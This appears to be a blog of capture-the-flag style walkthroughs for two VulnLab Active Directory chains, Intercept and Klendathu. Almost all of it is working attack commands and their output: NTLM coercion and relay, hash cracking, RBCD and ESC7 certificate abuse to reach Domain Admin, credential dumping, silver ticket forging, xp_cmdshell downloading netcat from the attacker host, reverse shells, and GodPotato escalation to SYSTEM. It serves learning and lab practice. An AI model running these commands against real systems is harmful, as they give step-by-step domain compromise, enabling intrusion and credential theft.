Author: admin
vulnlab-intercept
vulnlab intercept
Intercept is a hard rated chain which contains two machines WS01 and DC01. The chain starts with forced authentication using a file upload to grab a users hash. Using this user we performed the Resourced Based Contrained Delegation (RBCD) WebClient attack to escalate privileges. Finally using ESC7 we elevate privileges to Domain Admin.
.
$ smbclient -L \\\\ws01.intercept.vl Password for [WORKGROUP\puck]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share dev Disk shared developer workspace IPC$ IPC Remote IPC Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
.
upload files to smb share and capture hashes with smbserver.py/responder
$ impacket-smbserver share share -smb2support Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.250.118,63690) [*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01) [*] User WS01\Kathryn.Spencer authenticated successfully [*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] Connecting Share(1:IPC$) [-] SMB2_TREE_CONNECT not found x
.
$ smbclient \\\\ws01.intercept.vl\\dev
next we crack the hash
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked
try spraying the password on other domain users
ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success
But no result,
I also use ldapdomaindump to get some domain info in HTML format
python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245
next we do some bloodhound analysis
$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120
.
Check LDAP signing [ not enforced = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker SMB 10.10.250.117 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False) LDAP 10.10.250.117 389 DC01 [+] intercept.vl\kathryn.spencer:Chocolate1 LDAP-CHE... 10.10.250.117 389 DC01 LDAP Signing NOT Enforced! LDAP-CHE... 10.10.250.117 389 DC01 LDAPS Channel Binding is set to "NEVER"
Check Machine Quota [ 10 = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq SMB 10.10.250.117 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False) LDAP 10.10.250.117 389 DC01 [+] intercept.vl\kathryn.spencer:Chocolate1 MAQ 10.10.250.117 389 DC01 [*] Getting the MachineAccountQuota MAQ 10.10.250.117 389 DC01 MachineAccountQuota: 10
Check WebDAV service is also enabled [ enabled = not default]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav
.
RBCD WebClient Attack
Now that we know that the WebDAV service is active on WS01, LDAP Signing is disabled on the DC, and we can add machine accounts to the domain, we can abuse these conditions in combination with coerced authentication to escalate privileges. However, when relaying our coercion and add RBCD permissions to WS01 the authenticated connection has to originate from a trusted intranet zone. Luckily for us by default the “Authenticated Users” group can create child objects on the ADIDNS zone.
Preparing
$ python3 -m venv venv $ source venv/bin/activate $ pip install ldap3 dnspython $ pip install ldapdomaindump $ git clone https://github.com/CoreSecurity/impacket.git $ cd impacket $ python setup.py install ┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket] └─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support └─$ deactivate
.
$ git clone https://github.com/dirkjanm/krbrelayx.git
.
here it goes
Set your local dns server to the dc ip in /etc/resolv.conf before running
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ cat /etc/resolv.conf # Generated by NetworkManager search home nameserver 10.10.177.37
.
Add new dns entry that points to our attacker machine
$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
.
Verify if A-record is created on our attacker machine
$ nslookup kali.intercept.vl 10.10.177.37 Server: 10.10.177.37 Address: 10.10.177.37#53 Name: kali.intercept.vl Address: 10.8.2.138
Add a new machine account
.
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept] └─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept 'INTERCEPT/Kathryn.Spencer:Chocolate1' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Successfully added machine account WS02$ with password Start123!.
.
Listener for relaying auth to LDAP on the DC in order to configure RBCD on WS01$ (it's allowed to write it's own attribute)
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept] └─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da [sudo] password for puck: Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client DCSYNC loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 8080 [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl [*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED [*] Enumerating relayed user's privileges. This may take a while on large domains [*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left! [*] Delegation rights modified succesfully! [*] WS02$ can now impersonate users on WS01$ via S4U2Proxy
.Coerce Authentication from the workstation WS01$ using a non-default port so it's a WebDAV authentication
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN Trying pipe lsarpc [-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc] [+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! [-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED! [+] OK! Using unpatched function! [-] Sending EfsRpcEncryptFileSrv! [+] Got expected ERROR_BAD_NETPATH exception!! [+] Attack worked!
.Impersonate Administrator on WS01 by using our RBCD privileges
┌──(puck㉿kali)-[~/vulnlab/intercept] └─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password:Start123! [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
.
$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
.
$ impacket-secretsdump -k -no-pass ws01.intercept.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82::: ..snip.. [*] _SC_HelpdeskService Simon.Bowen@intercept.vl:b0OI_fHO859+Aw [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry
What a ride
next
Using certipy
to enumerate ADCS, we can see that one of the groups that has the ManageCA
permission is the ca-managers
group, which simon.bowen
has GenericAll
permissions over
$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA [*] Got CA configuration for 'intercept-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : intercept-DC01-CA DNS Name : DC01.intercept.vl Certificate Subject : CN=intercept-DC01-CA, DC=intercept, DC=vl Certificate Serial Number : 4CEE597D2BE3DC9E4F5CDA8401EA6373 Certificate Validity Start : 2023-06-27 13:24:59+00:00 Certificate Validity End : 2124-09-05 07:48:03+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : INTERCEPT.VL\Administrators Access Rights Enroll : INTERCEPT.VL\Authenticated Users ManageCa : INTERCEPT.VL\ca-managers INTERCEPT.VL\Domain Admins INTERCEPT.VL\Enterprise Admins INTERCEPT.VL\Administrators ManageCertificates : INTERCEPT.VL\Domain Admins INTERCEPT.VL\Enterprise Admins INTERCEPT.VL\Administrators [!] Vulnerabilities ESC7 : 'INTERCEPT.VL\\ca-managers' has dangerous permissions Certificate Templates : [!] Could not find any certificate templates
.
Since simon.bowen
is apart of a group that has control of the ca-managers
group, he can write himself into the group
net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>
.
ESC 7 Exploitation
Now we have a user that has ManageCA
permission on the CA, we can successfully abuse ESC 7
Add the user as an officer
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer simon.bowen Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'
Enable the SubCA template – This certificate is configured by default to allow for authentication, therefore we should enable it to be used
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'
Now request a certificate with the userPrincipalName (uPN) of the Administrator
- This request will get automatically denied, however, since Simon is an officer we can manually issue a certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. [*] Request ID is 6 Would you like to save the private key? (y/N) y [*] Saved private key to 6.key [-] Failed to request certificate
Issue the request
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully issued certificate
Get the certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Rerieving certificate with ID 6 [*] Successfully retrieved certificate [*] Got certificate with UPN 'Administrator@intercept.vl' [*] Certificate has no object SID [*] Loaded private key from '6.key' [*] Saved certificate and private key to 'administrator.pfx'
Authenticate with the PFX to the DC
$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@intercept.vl [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f
check
$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f
.
$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'
This was super fun.
Resources
vulnlab-klendathu
vulnlab-klendathu
Klendathu, an insane rated AD chain.
solved with , a nfs share containing a config file with password hash of zim@klendathu,vl, having guest access on MSSQL service, forcing authentication with sys.dm_os_file_exist
, forging silver ticket
then escalating privileges on SRV1
, spoofing domain user on SRV2
with the MSSQL user and then using ntdissector , a swiss army knife for your NTDS.dit files, and decrypting RDCMan
credentials with domain backup key using rdgdec.py
.
.
NFS Enum
$ showmount -e srv2.klendathu.vl Export list for srv2.klendathu.vl: /mnt/nfs_shares *
.
$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares
.
(puck㉿kali)-[~/vulnlab/klendathu/shares] $ cat Switch344_running-config.cfg Switch344#show running-config Building configuration... Current configuration : 4716 bytes version 12.2 ..snip.. enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/ enable password C1sc0 ..snip.. snmp-server community public RO snmp-server contact ZIM@KLENDATHU.VL ! end Switch344#
.
$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop 2024/08/29 10:14:58 > Using KDC(s): 2024/08/29 10:14:58 > dc1.klendathu.vl:88 2024/08/29 10:14:58 > [!] %q - %v Bad username: blank 2024/08/29 10:14:58 > [+] VALID USERNAME: administrator@klendathu.vl 2024/08/29 10:14:58 > [!] guest@klendathu.vl - USER LOCKED OUT 2024/08/29 10:15:03 > [+] VALID USERNAME: zim@klendathu.vl 2024/08/29 10:15:03 > Done! Tested 4 usernames (2 valid) in 5.043 seconds
.
$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt --force Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22
.
$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares SMB 10.10.220.149 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.149 445 DC1 [+] KLENDATHU.VL\zim:football22 SMB 10.10.220.149 445 DC1 [*] Enumerated shares SMB 10.10.220.149 445 DC1 Share Permissions Remark SMB 10.10.220.149 445 DC1 ----- ----------- ------ SMB 10.10.220.149 445 DC1 ADMIN$ Remote Admin SMB 10.10.220.149 445 DC1 C$ Default share SMB 10.10.220.149 445 DC1 HomeDirs READ SMB 10.10.220.149 445 DC1 IPC$ READ Remote IPC SMB 10.10.220.149 445 DC1 NETLOGON READ Logon server share SMB 10.10.220.149 445 DC1 SYSVOL READ Logon server share
.
$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares SMB 10.10.220.150 445 SRV1 [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.150 445 SRV1 [+] KLENDATHU.VL\zim:football22 SMB 10.10.220.150 445 SRV1 [*] Enumerated shares SMB 10.10.220.150 445 SRV1 Share Permissions Remark SMB 10.10.220.150 445 SRV1 ----- ----------- ------ SMB 10.10.220.150 445 SRV1 ADMIN$ Remote Admin SMB 10.10.220.150 445 SRV1 C$ Default share SMB 10.10.220.150 445 SRV1 IPC$ READ Remote IPC
.
$ impacket-smbclient zim@dc1.klendathu.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password:fo<redacted>22 Type help for list of commands # shares ADMIN$ C$ HomeDirs IPC$ NETLOGON SYSVOL # use HomeDirs # ls drw-rw-rw- 0 Thu Apr 11 02:58:10 2024 . drw-rw-rw- 0 Mon Apr 15 18:09:19 2024 .. drw-rw-rw- 0 Fri Apr 12 06:07:56 2024 CLEA drw-rw-rw- 0 Fri Apr 12 06:08:12 2024 DUNN drw-rw-rw- 0 Sat Apr 13 03:32:21 2024 JENKINS drw-rw-rw- 0 Fri Apr 12 06:08:59 2024 SHUJUMI # cd CLEA [-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Bloodhound Enum
$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip INFO: Found AD domain: klendathu.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: dc1.klendathu.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 4 computers INFO: Connecting to LDAP server: dc1.klendathu.vl INFO: Found 26 users INFO: Found 57 groups INFO: Found 6 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: srv2.klendathu.vl INFO: Querying computer: SRV1.KLENDATHU.VL INFO: Querying computer: WS1.KLENDATHU.VL INFO: Querying computer: DC1.KLENDATHU.VL INFO: Done in 00M 05S INFO: Compressing output into 20240829103520_bloodhound.zip
MSSQL access
We have MSSQL running on SRV1, so check if we can login there
$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' MSSQL 10.10.220.150 1433 SRV1 [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL) MSSQL 10.10.220.150 1433 SRV1 [+] KLENDATHU.VL\zim:foo<redacted>22
.
$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (KLENDATHU\ZIM guest@master)> enable_xp_cmdshell ERROR: Line 1: You do not have permission to run the RECONFIGURE statement. SQL (KLENDATHU\ZIM guest@master)> SELECT user_name() ----- guest SQL (KLENDATHU\ZIM guest@master)> xp_fileexist 'C:\' File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 0 1 1 SQL (KLENDATHU\ZIM guest@master)> xp_fileexist '\\10.8.2.138\puck:\' File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 0 0 0 SQL (KLENDATHU\ZIM guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\') file_exists file_is_a_directory parent_directory_exists ----------- ------------------- ----------------------- ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'. SQL (KLENDATHU\ZIM guest@master)>
we are guest, but we can use SELECT * FROM sys.dm_os_file_exists to find (with responder) the hash of the service account used to start the mssql service
responder -I tun0 [+] Current Session Variables: Responder Machine Name [WIN-GUNQV4VD574] Responder Domain Name [0N40.LOCAL] Responder DCE-RPC Port [47623] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.220.150 [SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK [SMB] NTLMv2-SSP Hash : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00
.
$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt --force hashcat (v6.2.6) starting this attack: 2 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99
Forging Silver Ticket
The mssql service is running as RASCZAK user so we create a silver ticket for him.
ldapdump
$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished
to get the domain sid
$ cat domain_users.grep | grep RAS RASCZAK RASCZAK RASCZAK Domain Users 04/11/24 00:35:58 08/29/24 07:55:28 08/29/24 07:55:28 NORMAL_ACCOUNT 04/12/24 03:46:53 S-1-5-21-641890747-1618203462-755025521-1131
convert the plain text pasword into nthash
$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4 MD4(stdin)= e2<redacted>2c
create the silver ticket
$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for KLENDATHU.VL/administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncTGSRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncTGSRepPart [*] Saving ticket in administrator.ccache $ export KRB5CCNAME=administrator.ccache
when on mssql shell 1st run:
# Enable xp_cmdshell > EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; # Verify we have SeImpersonatePrivilege > xp_cmdshell "whoami /priv"
.
$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (KLENDATHU.VL\administrator dbo@master)> SQL (KLENDATHU.VL\administrator dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile" output -------------------------------------------------------------------------------- PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe PS C:\Windows\system32> SQL (KLENDATHU.VL\administrator dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"
getting the reverse shell
$ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\Windows\system32> whoami /all whoami /all USER INFORMATION ---------------- User Name SID ================= ============================================ klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131
godpotato for privesc
PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell" ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell" [*] CombaseModule: 0x140725375598592 [*] DispatchTable: 0x140725378185544 [*] UseProtseqFunction: 0x140725377480928 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa [*] DCOM obj OXID: 0xb95cceeab6278323 [*] DCOM obj OID: 0xed06ad8662383e60 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 884 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 1092
getting the elevated reverse shell
$ rlwrap nc -nlvp 9002 listening on [any] 9002 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> whoami whoami nt authority\system PS C:\temp> hostname hostname SRV1
.
PS C:\users> cmd -c 'dir /A' cmd -c 'dir /A' Microsoft Windows [Version 10.0.20348.2402] (c) Microsoft Corporation. All rights reserved. C:\users> C:\Users\Administrator\Desktop>type flag.txt type flag.txt VL{9f<redacted>ef}
Spoofing Domain Users On GSSAPI Authentication
Checking Bloodhound outbound control on RASCZAK , we have GenericWrite
and ForeChangePassword
on two domain users, rico
and ibanez
, with this ACL we can change the password using rpcclient
or net rpc
$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"
verifying creds
$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!' SMB 10.10.220.149 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False) SMB 10.10.220.149 445 DC1 [+] KLENDATHU.VL\ibanez:Summer2024!
There’s a research done by Ceri Coburn from Pen Test Partners, where linux servers joined to AD have misconfiguration in the authentication mechanism where name-type, enterprise is used (NT_ENTERPRISE), if we have GenericWrite on a domain user, we can edit the userPrincipalName
attribute, this attribute is utilized by NT_ENTERPRISE
through which we can spoof domain users To abuse this we need to first identify the user that we’ll spoof, there’s a group named LINUX_ADMINS
with two members flores and leivy
Then adding userPrincpalName
to be any of the two users, for adding this attribute we can use ldapmodify
for that we need to create a ldif
file
$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif Enter LDAP Password: st<redacted>99 modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"
.
$ cat modify_user.ldif dn: CN=ibanez,CN=users,DC=klendathu,DC=vl changetype: modify add: userPrincipalName userPrincipalName: leivy
verify if ldap attribute is added/changed correctly
$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName userPrincipalName: leivy
tried Rubeus, but this did not work for me.
c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Ask TGT [*] Got domain: KLENDATHU.VL [*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C [*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy' [*] Using domain controller: 10.10.220.149:88 [X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Next i found how to Add -principal option to getTGT.py
.
